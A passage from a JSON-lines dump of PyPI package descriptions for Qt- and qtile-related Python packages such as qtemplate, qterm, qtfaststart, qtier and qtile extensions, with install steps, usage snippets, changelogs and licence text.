Press 1 to enter interactive (command) mode. In interactive mode, commands typed at the (QTEASY) prompt control the running strategies: you can operate the current account, query the trade history, change the state, and so on:

pause/resume: pause / restart the trading strategies
change: change the current positions and cash balance
positions: show the current positions
orders: show the current orders
history: show the historical trade records
exit: quit the TraderShell
... see the QTEASY documentation for more TraderShell commands"}
+{"package": "qtemplate", "pacakge-description": "qtemplate: A command line tool for managing and generating files or scripts from templates. Overview: qtemplate is a Linux command line tool that helps generate files from templates, settings/data files, and command line prompts. A common task is creating new scripts or files that follow a convention you want to adhere to. You want access to create these base scripts but don't want to have to copy files and manually replace tags. qtemplate is meant to have the feel of shell aliases, where defining a new template is easy and instantiating a new template is easy. 
By creating a simple directory structure for storing templates, default data, and plugins, we can ensure templates are available at a your fingertips, without pausing.Structureqtemplate supports system level configurations under/etc/qtemplatethat are overwritten by user level configurations under~/.qtemplate/.qtemplate/\n\u251c\u2500\u2500 conf.yaml\n\u2514\u2500\u2500 templates\n \u2514\u2500\u2500 example_template\n \u251c\u2500\u2500 example.jinja\n \u251c\u2500\u2500 example.json\n \u2514\u2500\u2500 example.yamlUnder the conf.yaml, you can configure your template stores. Default template stores are localhost directories.template_storesThe template stores config is the ordering in which templates are looked up. This is a cascading list in the conf.yaml:template_stores:-https://www.qsonlabs.com/qtemplate/registry/templates/-file://user@remote-host/etc/qtemplate/templates-file://localhost/~/.qtemplate/templates/-file://localhost/etc/qtemplate/templatesEach store should be a valid URI andqtemplatewill handle pulling the data using the appropriate connector. If a given template is not found, it will check the next template store in the list. This enables remote template repositoriesTemplatesA template should have at most 3 files:*.jinja - Mandatory file for a template. There should only be one .jinja file and that will be the template usedtemplate.conf - a file used to specify any template level configurations. All of these configs can be overwritten with command line params*.data - any default data that should be supplied to the jinja template. Default data can be provided directly in the jinja file but a separate .data file is more explicit. the *.data file can be json or yaml"} +{"package": "qtensor", "pacakge-description": "No description available on PyPI."} +{"package": "qtensor-qtree", "pacakge-description": "No description available on PyPI."} +{"package": "qt-epics", "pacakge-description": "Qt-based widgets for PyEpics devicesFree software: 3-clause BSD licenseDocumentation: (COMING SOON!)https://JunAishima.github.io/qt-epics.FeaturesTODO"} +{"package": "qterm", "pacakge-description": "QTermQTerm is a Python module for spawning child applications and controlling them automatically.Installpip install qtermUsageTo interract with a child process useQTermclass:fromqtermimportQTermwithQTerm()asterm:print(term.exec('cd'))In case command prompt pattern changes usetemp_promptmethod:fromqtermimportQTerm,PYTHONprint(PYTHON)withQTerm()asterm:withterm.temp_prompt(*PYTHON):print(term.exec('1+1'))# TermArgs(SPAWN_COMMAND='python', PROMPT=re.compile('^>>> '), EXIT_COMMAND='exit()')# ['2']"} +{"package": "qtest", "pacakge-description": "UNKNOWN"} +{"package": "qtestpackage", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "qtestpackage2", "pacakge-description": "No description available on PyPI."} +{"package": "qtest-reporter", "pacakge-description": "qTest reporterqtest-reporter is a tool that allows you to easily report the results of your automated testing to the qTest test management tool."} +{"package": "qtex", "pacakge-description": "No description available on PyPI."} +{"package": "qtextras", "pacakge-description": "Qt ExtrasGeneral Scientific Python Qt GUI UtilitiesA collection of Python Qt GUI builders and other functions I've found helpful as I develop\npython mockups.Installationqtextraslives in pypi too, so the easiest way to install it is throughpip:pipinstallqtextrasNote that a version of Qt must be installed for it to work, such as PyQt5/6 or Pyside2/6.\nPySide6 will also be installed withpip install qtextras[full]Alternatively, you can do so through downloading the repository:gitclonehttps://gitlab.com/s3a/qtextras\npipinstall-e./qtextras# Or ./qtextras[full] as mentioned aboveUsageUsage will vary depending on the requested capabilities. Check out theexamplesfolder for some usages"} +{"package": "qtfaststart", "pacakge-description": "Quicktime/MP4 Fast StartEnable streaming and pseudo-streaming of Quicktime and MP4 files by\nmoving metadata and offset information to the front of the file.This program is based on qt-faststart.c from the ffmpeg project, which is\nreleased into the public domain, as well as ISO 14496-12:2005 (the official\nspec for MP4), which can be obtained from the ISO or found online.The goals of this project are to run anywhere without compilation (in\nparticular, many Windows and Mac OS X users have trouble getting\nqt-faststart.c compiled), to run about as fast as the C version, to be more\nuser friendly, and to use less actual lines of code doing so.FeaturesWorks everywhere Python (2.6+) can be installedHandles both 32-bit (stco) and 64-bit (co64) atomsHandles any file where the mdat atom is before the moov atomPreserves the order of other atomsCan replace the original file (if given no output file)Installing from PyPiTo install from PyPi, you may useeasy_installorpip:easy_install qtfaststartInstalling from sourceDownload a copy of the source,cdinto the top-levelqtfaststartdirectory, and run:python setup.py installIf you are installing to your system Python (instead of a virtualenv), you\nmay need root access (viasudoorsu).UsageSeeqtfaststart--helpfor more info! If outfile is not present then\nthe infile is overwritten:$ qtfaststart infile [outfile]To run without installing you can use:$ bin/qtfaststart infile [outfile]To see a list of top-level atoms and their order in the file:$ bin/qtfaststart --list infileIf on Windows, the qtfaststart script will not execute, so use:> python -m qtfaststart ...History2013-08-07: Copy input file permissions to output file.2013-08-06: Fix a bug producing 8kb mdat output.2013-07-05: Introduced Python 3 support.2013-07-05: Added launcher via \u2018python -m qtfaststart\u2019.2013-07-05: Internal refactoring for clarity and robustness. Functions\nnow work with named tuples. Backward compatability is maintained. 
Expect\na future, backward-incompatible release to replace other functions.2013-07-05: Created anAtomnamedtuple to represent a fourcc atom\n(name, stream position, and size).2013-01-28: Support strange zero-name, zero-length atoms, re-license\nunder the MIT license, version bump to 1.72011-11-01: Fix long-standing os.SEEK_CUR bug, version bump to 1.62011-10-11: Packaged and published to PyPi by Greg Taylor\n, version bump to 1.5.2010-02-21: Add support for final mdat atom with zero size, patch by\nDmitry Simakov , version bump to 1.4.2009-11-05: Added \u2013sample option. Version bump to 1.32009-03-13: Update to be more library-friendly by using logging module,\nrename fast_start => process, version bump to 1.22008-10-04: Bug fixes, support multiple atoms of the same type,\nversion bump to 1.12008-09-02: Initial releaseLicenseCopyright (C) 2008 - 2013 Daniel G. Taylor Permission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \u201cSoftware\u201d), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE."} +{"package": "qtfaststart2", "pacakge-description": "No description available on PyPI."} +{"package": "qtfind", "pacakge-description": "QtFindgraphical interface for the powerful command findInstallationDescriptionLicenseFeaturesReport a bugScreenshotsChangelogInstallationpip install qtfindTo avoid running the app from the command line, you need to add it to your apps menu:Download thisscriptOpen the terminal andcdto the location ofsetup.shrun:chmod u+x setup.shrun:./setup.shHead to your apps menu, type qtfind or you can find it under Accessories.Description:mag:QtFindis a graphical interface for the powerful commandfind.:mag:QtFindis designed with new comers to linux in mind.:mag:QtFindalso reveals the full command of the selected combination.:mag:QtFindis made with PyQt5from the man pageGNU find searches the directory tree rooted at each given file name by evaluating the given expression from left to right, according to the rules of precedence.LicenseThis program comes with absolutely no warranty.\nSee theGNU General Public Licence, version 3 or later for details.FeaturesDefault and dark (4 tones) themesShow/Copy constructed commandInterrupt searchMost of find options available (refer toman findfor more information)Report a bughttps://github.com/amad3v/QtFind/issuesScreenshotsDark theme (tone: green):Default theme:Changelog1.0.3:Added About QtMinor changes1.0.2:Fixed issue saving settings in different Linux distros (dbm related)1.0.1:Clean-up code1.0:Initial releaseCopyright :copyright: 2019 - amad3v"} +{"package": "qtfn", "pacakge-description": "qtfnIf you need any help with the package, 
join the discord:https://discord.io/qtfnJ"} +{"package": "qtforms", "pacakge-description": "mikroqtforms is a library that allows you to create simple forms in Qt for Python with the help of\npydantic.InstallationpipinstallqtformsQuick StartfromqtpyimportQtWidgetsfrompydanticimportBaseModel,validator,Fieldimportsysfromqtforms.labeled_registryimportLabeledWidgetRegistryfromqtforms.formimportFormclassMyModel(BaseModel):name:str=Field(\"hundi\",min_length=3,max_length=50,description=\"Your name\")number:int=Field(1,ge=0,le=100,description=\"A number between 0 and 100\")@validator(\"name\")defname_must_contain_space(cls,v):if\" \"notinv:raiseValueError(\"Name must have a space\")returnv.title()if__name__==\"__main__\":app=QtWidgets.QApplication(sys.argv)model=MyModel(name=\"hello world\")##model.events.name.connect(lambda x: print(x))form=Form(LabeledWidgetRegistry(),MyModel,initial_data=dict(name=\"hello world\"),auto_validate=True)form.submit.connect(lambdax:print(x))form.show()sys.exit(app.exec_())DesignFor the design of qtform, we use the following design:Formis the container and controller for the form. It calls the widget registry to spawn the widgets for the fields.\nThese widgets need to follow theFormWidgetinterface, and implement functions to set values and report errors.Formalso handles the validation of the form, and emits asubmitsignal when the form is valid and the submit button is pressed\n(or when auto_submit is enabled on each valid change). Validation is done by pydantic, and the validated values are immediately\nreported to the widgets."} +{"package": "qtft-qopt", "pacakge-description": "No description available on PyPI."} +{"package": "qtgallery", "pacakge-description": "Scraper for generating asphinx-galleryof Qt widgets.This repository serves both as a library for grabbing renderings of Qt widgets\nto add to your ownsphinx-galleryconfig as well as an example of its usage.InstallationFor the time being, clone the repo and install from source:$ git clone git@github.com:ixjlyons/qtgallery.git\n$ cd qtgallery\n$ pip install .Now you should be able to generate the docs/gallery:$ cd doc\n$ make htmlOpen updoc/_build/html/index.htmlto see built docs. They\u2019re currently\nbeing hosted by Read the Docs as well:https://qtgallery.readthedocs.io/ConfigurationTo useqtgalleryin your own documentation, start by setting upsphinx-gallery. This library provides two key components to add to yoursphinx_gallery_conf: animage scraperand areset function:# sphinx conf.pyimportqtgallerysphinx_gallery_conf={...'image_scrapers':(qtgallery.qtscraper,...),'reset_modules':(qtgallery.reset_qapp,...),...}The image scraper is responsible for generating a rendering of all currently\nshown top level widgets.The reset function is for handlingQApplication, allowing you to instantiate\ntheQApplicationsingleton in each example and preventing the Qt event loop\nfrom running and hanging the docs build. That is, examples that run ok standalone\nshould behave ok in generating the gallery.UsageUsage pretty much followssphinx-gallery, but one tip is that you can controlwherethe widget/window is rendered viashow(). See theiterative\nexampleto see how this works.Read the DocsOn Read the Docs,xvfbis required. See their documentation forinstalling\napt packages. 
This repository also serves as an example (see.readthedocs.yml)."} +{"package": "qtgql", "pacakge-description": "QtGqlGraphQL client for Qt-QML.This project is currently under development, andit is notproduction ready,\nYou can play-around and tell us what is wrong / missing / awesome :smile:.Visit the docs for more info(WIP)."} +{"package": "qt-graph-helpers", "pacakge-description": "== Qt Graph Helpers ==Qt Graph Helpers are a group of PyQt helpers that could not be implemented in python as they would be too slow. They are used in Orange (https://github.com/orange3).= Prerequisites =Qt Graph Helpers need sip and development versions of Qt and PyQt to build. (qt-dev, python-qt-dev or similar on linux).= Installation =To install run:python setup.py install"} +{"package": "qtgrid", "pacakge-description": "qtgridThis pythonqtgridpackage is forPyQt, orPySidedevelopers. It helps to buildQGridLayout'sdynamically and with visual help during implementation time. Note thatqtgridworks in the same way for PyQt6, PyQt5, and PySide6.Please visit thedocumentation homepageto find an example usage, atutorial, areference manual, and for the brave theAPI Documentation.InstallUse pip or pipenvpip install qtgridpipenv install qtgridGet the current development source from GitHubgit clonehttps://github.com/devlog42/qtgridWhen importingqtgrid, for an installation of PyQt6, PyQt5, or PySide6 is tested in that order.\nIf none of these are found, a corresponding error message is issued.ContributionEvery contribution that advances this project is very welcome.If you want to report a bug or ask about a new feature, please visit the dedicatedissuespage. There you'll find suitable templates for your request, including one that is esspecially intended for mistakes in the documentations.However, if you want to get involved in development, please check out theContributionpage first.When you write posts, it goes without saying that you use a friendly language. Of course there is also a separate page on the topic calledCode of Conduct.LicenseTheLicenseof this package comes in terms ofGNU LGPLv3."} +{"package": "qtgui", "pacakge-description": "python3 pyqt wraper"} +{"package": "qth", "pacakge-description": "No description available on PyPI."} +{"package": "qth-alias", "pacakge-description": "No description available on PyPI."} +{"package": "qt-handy", "pacakge-description": "qt-handy"} +{"package": "qth-darksky", "pacakge-description": "No description available on PyPI."} +{"package": "qtheory", "pacakge-description": "It is a Python library implementing the Queueing theory calculations. As my term paper, I am developing a library, implementing the calculus of queuing theory. This library has the objective of characterising some queuing theory params as the queue arrival rate of clients, attendance rate and others\u2026 Implementing in python, this library receives a input file with queue data and gives the output answers. 
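To make the kind of quantities such a library reports concrete, here is a minimal, generic M/M/1 sketch. It only illustrates the standard single-server queueing formulas; it does not use qtheory's actual API, and the function name and parameter names are illustrative only.

def mm1_metrics(arrival_rate: float, service_rate: float) -> dict:
    # Standard M/M/1 results for a single-server queue (illustrative only).
    if arrival_rate >= service_rate:
        raise ValueError("Unstable queue: arrival rate must be below the service rate.")
    rho = arrival_rate / service_rate  # server utilisation
    return {
        "utilisation": rho,
        "avg_in_system": rho / (1 - rho),         # L: average number of clients in the system
        "avg_in_queue": rho ** 2 / (1 - rho),     # Lq: average number waiting in the queue
        "avg_time_in_system": 1 / (service_rate - arrival_rate),                             # W
        "avg_wait_in_queue": arrival_rate / (service_rate * (service_rate - arrival_rate)),  # Wq
    }

# e.g. 2 arrivals per minute served at 3 per minute gives a utilisation of about 0.67
print(mm1_metrics(2.0, 3.0))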
For the undergraduate thesis, I had toke some datas in a real queue and submited to the library as a input, to validate this project."} +{"package": "qth-gc", "pacakge-description": "No description available on PyPI."} +{"package": "qth-ls", "pacakge-description": "No description available on PyPI."} +{"package": "qth-national-rail", "pacakge-description": "No description available on PyPI."} +{"package": "qth-notify", "pacakge-description": "No description available on PyPI."} +{"package": "qth-openwrt-status", "pacakge-description": "No description available on PyPI."} +{"package": "qth-panasonic-viera", "pacakge-description": "No description available on PyPI."} +{"package": "qth-postgres-log", "pacakge-description": "No description available on PyPI."} +{"package": "qThread", "pacakge-description": "qThread provides an simplified and safe way to stop long running\nthreads. Typical uses often look like this:# Test / Usage of the stoppable thread\nclass MyThreadingClass(StoppableThread):\n def __init__(self, a):\n super(MyThreadingClass, self).__init__()\n self.a = a\n self.b = \"World\"\n self.delay = .5 # seconds\n\n def startup(self):\n # Overload the startup function\n print \"My Thread Starting Up...\"\n\n def cleanup(self):\n # Overload the cleanup function\n print \"My Thread Is Shutting Down...\"\n # Close files, ports, etc...\n time.sleep(4)\n print \"Cleanup Complete!\"\n\n def mainloop(self):\n # Some routine to be called over and over\n # ie: reading ports or sockets\n print self.a + \" \" + self.b\n\n # Throttling needs to be done here if the\n # primary function is not blocking\n time.sleep(self.delay)"} +{"package": "qth-registrar", "pacakge-description": "No description available on PyPI."} +{"package": "qth-yarp", "pacakge-description": "No description available on PyPI."} +{"package": "qth-zwave", "pacakge-description": "No description available on PyPI."} +{"package": "qtico", "pacakge-description": "This package provides tools to manage PyQt icon themes.TheQIcon.fromThemeAPI works with icon themes following thefreedesktop icon theme spec,\nwhich is great for Linux systems with installed and enabled themes, but not for Windows or OS X, which lack them.To benefit, you just have to create a theme directory with the right structure and use this package\u2019s functions:icons (The default directory name)\n\u251chicolor\n\u2502\u251c16x16/apps/myapp.png\n\u2502\u251c32x32/apps/myapp.png\n\u2502\u2506\n\u2502\u2514scalable/apps/myapp.svg\n\u2514mypackage-builtin\n \u251c16x16\n \u2502\u251cactions\n \u2502\u2502\u251cdocument-open.png\n \u2502\u2502\u2506\n \u2502\u251cmimetypes\n \u2502\u2502\u251capplication-x-mymime.png\n \u2506\u2506\u2506This package provides the following functions to ease bundling an in-memory icon theme for those systems:write_theme_indicesCreates.index.themefiles from the.pngand.svgfiles.write_resourcesCreate a.qrcand_rc.pyfile to import the icon data from. (Needs the.index.themefiles)write_iconsetCreates a iconset folder for OSX apps, e.g. 
viapy2app, using thehicolor/x/apps/myapp.pngfiles.install_icon_themeTo be used in a running application to make the builtin icons available.Thehicolor/x/apps/myapp.pngfiles can beinstalled to the system by packagers (/usr/share/icons/hicolor/\u2026)subsequently used in a .desktop file (Icon=myapp)used as window icon (self.setWindowIcon(QIcon.fromTheme('myapp')))"} +{"package": "qtics", "pacakge-description": "Qtics - Quantum Technologies Instrumentation ControlSOverviewQtics is a collection of tools designed to facilitate the instrumentation of theBiQuTe Cryogenic Laboratory.In the experiments folder, some experiments are provided as examples, along with\nvarious helpers.DocumentationYou can find the latest documentationhere.Installation instructionsStable version:To install the latest released version, you can use the standard pip command:pipinstallqticsLatest version:To install the latest version, unreleased, you can first clone the repository\nwith:gitclonehttps://github.com/biqute/qtics.gitthen to install it in normal mode:pipinstall.Use poetry to install the latest version in developer mode, remember to also\ninstall the pre-commits!poetryinstall--withdocs,analysis,experiments\npre-commitinstallLicenseQtics is licensed under theApache License 2.0. See theLICENSEfile for details."} +{"package": "qtido", "pacakge-description": "qtidoest une biblioth\u00e8que Python(3) pour tracer des figures g\u00e9om\u00e9trique et faire des petits jeux.\nUne sorte de documentation est disponible surhttps://learn.heeere.com/python/reference-qtido/Elle est bas\u00e9e sur les principes de conception et buts suivants\u00a0:offrir une version de la bibloth\u00e8que dans la langue de l'apprenant (le fran\u00e7ais ici, mais qtido est con\u00e7ue pour \u00eatre traduite),offrir une interface de programmation imp\u00e9rative sans \"callback\" ni asynchronisme apparent,permettre, entre autre, de faire des animations \u00e0 interval de temp constant (si l'ordinateur est assez rapide),cr\u00e9er une abstraction qui permette un ex\u00e9cution des programmes aussi bien sur desktop (avec PyQt) que dans un navigateur (brython + impl\u00e9mentation en javascript de la biblioth\u00e8que)Le nom est un m\u00e9lange deQt(composant graphiques utilis\u00e9s par d\u00e9faut) et deido(langue universelle).Installationpip install qtidoExemple simplefromqtidoimport*defmickey(fen,x,y,rayon):\"\"\"Cette fonction trace un mickey\"\"\"couleur(fen,1,1,1)# Blancdisque(fen,x,y,rayon)# cX, cY, rayoncouleur(fen,1,0,0)# Rougedisque(fen,x+rayon/2,y-rayon,rayon/2-1)disque(fen,x-rayon/2,y-rayon,rayon/2-1)couleur(fen,0,0.7,0)# Vertdisque(fen,x,y,rayon/5)f=creer(400,200)# cr\u00e9er une fen\u00eatremickey(f,50,50,20)mickey(f,100,50,5)mickey(f,200,50,20)mickey(f,250,50,20)mickey(f,300,50,20)mickey(f,100,120,40)mickey(f,200,120,30)mickey(f,300,120,20)mickey(f,350,120,10)attendre_fermeture(f)"} +{"package": "qtier", "pacakge-description": "qtierCuter approach to Qt-for-python, with focus on type hints, JSON APIs and QML.Example Usage:The following example shows how qtier can be used to query a graphql service.models.pyfromqtier.itemsystemimportrole,define_roles@define_rolesclassWorm:name:str=role()family:str=role()size:int=role()@define_rolesclassApple:size:int=role()owner:str=role()color:str=role()# nested models are also supported!worms:Worm=role(default=None)qtier will create for youQAbstractListModelto be used in QML you only need to\ndefine your models withdefine_roles.\nqtier initializes the data with a dict, in this case coming from 
graphql service.main.pyimportglobimportosimportsysfrompathlibimportPathfromqtpy.QtQmlimportQQmlApplicationEnginefromqtpy.QtCoreimportQObject,SignalfromqtpyimportQtCore,QtGui,QtQml,QtQuickfromqtierimportslotfromqtier.gql.clientimportHandlerProto,GqlClientMessage,GqlWsTransportClientfromqtier.itemsystemimportGenericModelfromtests.test_sample_ui.modelsimportAppleclassEntryPoint(QObject):classAppleHandler(HandlerProto):message=GqlClientMessage.from_query(\"\"\"query MyQuery {apples {colorownersizeworms {familynamesize}}}\"\"\")def__init__(self,app:'EntryPoint'):self.app=appdefon_data(self,message:dict)->None:self.app.apple_model.initialize_data(message['apples'])defon_error(self,message:dict)->None:print(message)defon_completed(self,message:dict)->None:print(message)def__init__(self,parent=None):super().__init__(parent)main_qml=Path(__file__).parent/'qml'/'main.qml'QtGui.QFontDatabase.addApplicationFont(str(main_qml.parent/'materialdesignicons-webfont.ttf'))self.qml_engine=QQmlApplicationEngine()self.gql_client=GqlWsTransportClient(url='ws://localhost:8080/graphql')self.apple_query_handler=self.AppleHandler(self)self.gql_client.query(self.apple_query_handler)self.apple_model:GenericModel[Apple]=Apple.Model()QtQml.qmlRegisterSingletonInstance(EntryPoint,\"com.props\",1,0,\"EntryPoint\",self)# type: ignore# for some reason the app won't initialize without this event processing here.QtCore.QEventLoop().processEvents(QtCore.QEventLoop.ProcessEventsFlag.AllEvents,1000)self.qml_engine.load(str(main_qml.resolve()))@QtCore.Property(QtCore.QObject,constant=True)defappleModel(self)->GenericModel[Apple]:returnself.apple_modeldefmain():app=QtGui.QGuiApplication(sys.argv)ep=EntryPoint()# noqa: F841, this collected by the gc otherwise.ret=app.exec()sys.exit(ret)if__name__==\"__main__\":main()"} +{"package": "qtile", "pacakge-description": "A full-featured, hackable tiling window manager written and configured in PythonFeaturesSimple, small and extensible. It\u2019s easy to write your own layouts,\nwidgets and commands.Configured in Python.Runs as an X11 WM or a Wayland compositor.Command shell that allows all aspects of Qtile to be managed and\ninspected.Complete remote scriptability - write scripts to set up workspaces,\nmanipulate windows, update status bar widgets and more.Qtile\u2019s remote scriptability makes it one of the most thoroughly\nunit-tested window managers around.CommunityQtile is supported by a dedicated group of users. If you need any help, please\ndon\u2019t hesitate to fire off an email to our mailing list or join us on IRC. You\ncan also ask questions on the discussions board.Mailing List:https://groups.google.com/group/qtile-devQ&A:https://github.com/qtile/qtile/discussions/categories/q-aIRC:irc://irc.oftc.net:6667/qtileDiscord:https://discord.gg/ehh233wCrC(Bridged with IRC)Example codeCheck out theqtile-examplesrepo which contains examples of users\u2019 configurations,\nscripts and other useful links.ContributingPlease report any suggestions, feature requests, bug reports, or annoyances to\nthe GitHubissue tracker. There are also a fewtips & tricks,\nandguidelinesfor contributing in the documentation.Please also consider submitting useful scripts etc. 
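As a minimal sketch of that initialization step, the generated model can also be filled with a plain list of dicts, using only the calls shown above (Apple.Model() and initialize_data); the field names mirror the role definitions and the GraphQL query, while the sample values themselves are invented for illustration.

# assumes the Apple/Worm models defined with @define_roles above are importable
apple_model = Apple.Model()
apple_model.initialize_data([
    {
        "color": "red",
        "owner": "alice",
        "size": 3,
        "worms": [
            {"name": "jim", "family": "earthworm", "size": 1},
        ],
    },
])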
to the qtile-examples repo\n(see above).Maintainers@tych0GPG:3CCA B226 289D E016 0C61 BDB4 18D1 8F1B C464 DCA3@ramnesGPG:99CC A84E 2C8C 74F3 2E12 AD53 8C17 0207 0803 487A@m-colGPG:35D9 2E7C C735 7A81 173E A1C9 74F9 FDD2 0984 FBEC@flacjacketGPG:58B5 F350 8339 BFE5 CA93 AC9F 439D 9701 E7EA C588@elParaguayoGPG:A6BA A1E1 7D26 64AD B97B 2C6F 58A9 AA7C 8672 7DF7@jwijenberghGPG:B1C8 1CF3 063B 5836 4946 3687 4827 061B D417 C233"} +{"package": "qtile-extras", "pacakge-description": "elParaguayo's Qtile ExtrasThis is a separate repo where I share things that I made for qtile that (probably) won't ever end up in the main repo.This things were really just made for use by me so your mileage may vary.Documentation can be foundhere."} +{"package": "qtile-mutable-scratch", "pacakge-description": "qtile MutableScratchThis package is a series of functions and a class to create a \"scratch\" space\nin qtile more similar to i3's. qtile has theScratchPadgroup type, but the\n(documented) purpose is to only hostDropdownwindows that must be specified\nahead of time.Instead, whatMutableScratchdoes is piggybacks onto an \"invisible\" qtileGroup(ie. a group named'') and provide functions to dynamically add and\nremove windows to this group. Viewing the \"hidden\" windows is done via a toggle\nfunction, which cycles through the windows in the Scratch group. All windows\nadded to theMutableScratchgroup will be automatically converted to\nfloating. This emulates the scratch functionality of i3 as closely as possible.Seerepository README for most up-to-date documentation.InstallationYou can now install viapip:pip install qtile_mutable_scratchSetupPut the following default configuration in yourconfig.py:importqtile_mutable_scratchfromlibqtile.configimportEzKeyfromlibqtileimporthook...mutscr=qtile_mutable_scratch.MutableScratch()groups.append(Group(''))# Must be after `groups` is createdkeys.extend([EzKey('M-S-',mutscr.add_current_window()),EzKey('M-C-',mutscr.remove_current_window()),EzKey('M-',mutscr.toggle()),])hook.subscribe.startup_complete(mutscr.qtile_startup)EachMutableScratchinstance has two parameters to chose from,scratch_group_nameandwin_attr.\nIt's not necessary to set these, as the default configuration\nshould work for every configuration.scratch_group_name(default'', or the empty name group) sets the name of the group that will old the scratch windows.win_attr(defaultmutscratch) sets the attribute that will be set on each window to tag it as being apart of theMutableScratchsystem.UsageAdd the current window to theMutableScratchgroup viaMutableScratch.add_current_window()This will move the window to the invisible groupRotate through windows in theMutableScratchgroup viaMutableScratch.toggle()If the current window is apart of theMutableScratchgroup, then it will be moved back to the invisible groupIf the current window is not apart of theMutableScratch, then the nextMutableScratchwindow in the stack will be moved to the current groupTo remove a window from theMutableScratchgroup, useMutableScratch.remove()Hastily thrown together demo video:It's ugly, but it get's the point across...hopefully.https://user-images.githubusercontent.com/20801821/147259912-5acec613-239b-4fe3-aebb-9c1820426d2c.mp4Implementation DetailsTracking members of theMutableScratchgroupThis is done by dynamically adding an attribute (by defaultmutscratch) to\nthe window object that simply stores a boolean.Cycling through windows inMutableScratchMutableScratchhas something similar to qtile'sfocus_historyfor groups.\nIt's effectively just a 
stack of windows belonging to theMutableScratchgroup, where windows are pushed and popped from the stack.\nDoing this,MutableScratchcontrols the order in which the windows are stored in the stack.\nThis ensures that the every window in theMutableScratchgroup can be accessed via toggle.Initializing theMutableScratchon qtile startWhen restarting qtile, theMutableScratchinstance inconfig.pywill be overwritten, losing the stack history and the floating window status of it's windows.\nTo stop this, we add ahookfunction tostartup_completethat will reinitialize a newMutableScratchinstance with the windows that are located in theMutableScratch.scratch_group_name."} +{"package": "qtile-passimapwidget", "pacakge-description": "qtile-passimapwidgetqtile-passimapwidget"} +{"package": "qtile-plasma", "pacakge-description": "No description available on PyPI."} +{"package": "qtile-profiles", "pacakge-description": "qtile-profilesIm using my laptop for work and private stuff and wanted to use some kind of profiles.InstallationYou can install the package using pippipinstallqtile-profilesUsagefromqtile_profilesimportProfile,ProfileManagerdefset_browser(browser:str):subprocess.run(f\"xdg-mime default{browser}x-scheme-handler/http\",shell=True,)subprocess.run(f\"xdg-mime default{browser}x-scheme-handler/https\",shell=True,)work=Profile(programs={# define some aliases for shorter commands later\"firefox\":\"firefox\",\"thunderbird\":\"flatpak run org.mozilla.Thunderbird\",# see 6 lines down\"teams\":\"chromium --app=https://teams.office.com\",},init=[# spawn these program when calling initialize(\"web\",[\"firefox\"]),(\"chat\",[\"mattermost-desktop\",\"teams\"]),(\"mail\",[\"tunderbird\"]),# here we can use thunderbird insead of calling flatpak(\"kp\",[\"keepassxc\"]),],on_load=lambdaqtile:set_browser(\"firefox.desktop\")# callback, call when profile is selected)privat=Profile(programs={\"firefox\":\"firefox -P privat\",\"thunderbird\":\"thunderbird\",\"discord\":\"discord\",},init=[(\"web\",[\"firefox\"]),(\"chat\",[\"signal-desktop\",\"discord\"]),(\"mail\",[\"thunderbird\"]),(\"kp\",[\"keepassxc\"]),],on_load=lambdaqtile:set_browser(\"firefox-privat.desktop\"))profiles=ProfileManager([work,privat])keys.extend([Key([super],\"p\",lazy.function(profiles.next_profile)),Key([super],\"f\",lazy.function(profiles.spawn,\"firefox\")),Key([super],\"i\",lazy.function(profiles.current_profile.spawn_init)),])"} +{"package": "qtile-window-trashbin", "pacakge-description": "qtile-window-trashbinQtile Extension to reopen closed windows. Never think \"Oh shit\" again when you close a window.InstallationYou can install the package using pippipinstallqtile-window-trashbinUsageThis module adds a \"Thrashbin\" class. Use it in your keybindings instead of kill. The pane will be killed after a given time.U could put the following in your ~/.config/qtile/config.pyfromtrashbinimportTrashbintrash_group=ScratchPad(\"killPane\")#We use an invisible Group: A ScratchPad.groups.extend([trash_group])# Let's append it to to groups.trash=Trashbin(trash_group.name,delay=5)# Initialize the Trashbin. Use the newly created Group to store the windows. Kill a Window put to the trashbin afert 5 seconds.keys.extend([Key([mod],\"q\",lazy.function(trash.append_currend_window)),# move to trashKey([mod,\"shift\"],\"q\",lazy.window.kill()),# real kill. 
Sometimes you want to kill insteadly.Key([mod,\"shift\"],\"e\",lazy.function(trash.pop_to_current_group))# Restore the last window put to the trashbin.])Afterwards you can hitSuper + qand the current window be moved to the trash.\nHitSuper + Shift + eto restore the last window, put to the trashbin.\nSometimes moving a window to the trash is not what you want.\nFor example when quiting an video player you may want to stop the playing immediately.\nHitSuper + Shift + qto quit immediatley. Caution: This is not undoable."} +{"package": "qtilities", "pacakge-description": "# qtilitiesA collection of utility programs for PyQt5 development.## Installation### From PyPIpip install qtilities### From sourcegit clone https://github.com/pylipp/qtilitiescd qtilitiesmake install## Contents### `pqp` and `pqpc`> Python QML Previewer and Client`pqp` previews QML components and continuously updates while you're editing the source code.#### StartLaunch an empty previewer:> pqpLaunch the previewer displaying one or more components by providing the paths:> pqp TextFoo.qml bar/ComboBaz.qml#### Loading componentsLoad components by clicking the 'Load' button.Alternatively you can run the client:> pqpc HackWindow.qmlIt sends one or more component paths via UDP to port 31415. The previewer `pqp` listens to that port and loads the components.#### Pausing/resuming preview`pqp` continuously updates, regardless of changes in the source code or not. If you wish to test user interaction functionality of your component, you can pause the preview by clicking the 'Preview' button.### `qmltags`> Basic ctags generator for QML components`qmltags` generates 'class' ctags for custom QML components.Run without arguments to recursively parse the current directory and its subdirectories for QML files> qmltagsAlternatively, you can provide one or more paths to QML components:> qmltags HackWindow.qml screen/*.qmlThis assumes that your shell performs file name expansion.Note that `qmltags` overwrites a `tags` file in the current working directory if it exists.### `pyqmlscene`> Basic Python port of the `qmlscene` utilityRun with a QML 